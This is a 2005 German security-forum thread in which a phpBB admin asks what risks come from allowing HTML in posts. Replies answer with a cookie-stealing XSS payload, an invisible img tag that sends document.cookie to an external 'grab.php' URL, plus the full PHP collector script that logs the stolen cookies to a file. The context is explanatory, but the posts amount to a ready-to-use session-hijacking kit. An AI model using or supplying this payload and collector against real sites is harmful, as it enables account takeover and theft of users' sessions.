Wenn HTML an ist...

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Raven, 29. Mai 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 29. Mai 2005
    HI!

    Wenn ich ein einem phBB (Board) HTML in den Beiträgen usw erlaube entsstehen dann Gefahren für mich?
    Wenn ja welche.

    mfg
     

  2. Anzeige
  3. #2 29. Mai 2005
    Benutzer könen alle Cookies und somit die Accounts von anderen Usern klauen.
     
  4. #3 29. Mai 2005
    Und wie genau?
     
  5. #4 29. Mai 2005
    Code:
    <img width=0 height=0 src="javascript:document.images[0].src='http://www.meineseite.de/pentest/grab.php?data=' document.cookie">
    
     
  6. #5 29. Mai 2005
    Kannst du auch eine ERklärung dazu liefern?

    mfg
     
  7. #6 30. Mai 2005
    Angenommen in einem Forum ist HTML in den Beiträgen erlaubt:

    Du schreibst einen Post, der folgendes beinhaltet
    Dieser Code wird bei jedem Browser, der versucht das Bild anzuzeigen so interpretiert:
    Zeige ein Bild an, welche 0*0 Pixel groß ist (also zeige garnichts an), welche an der Adresse http://www.meineseite.de/pentest/grab.php?data=' document.cookie zu finden ist.
    Dumm ist nur dass der Browser bei der Anfrage den eigenen Cookie mit anhängt, so dass du diesen nurnoch mit einem Script abzugreifen brauchst.

    grab.php:
    Code:
    <?
    error_reporting
    (E_ALL ^ E_NOTICE);
    $cookie = $_REQUEST[data];
    $fic=fopen("results/cookies.txt", "a");
    fwrite($fic, "$cookie\n");
    fclose($fic);
    ?>
    
     

  8. Videos zum Thema
Die Seite wird geladen...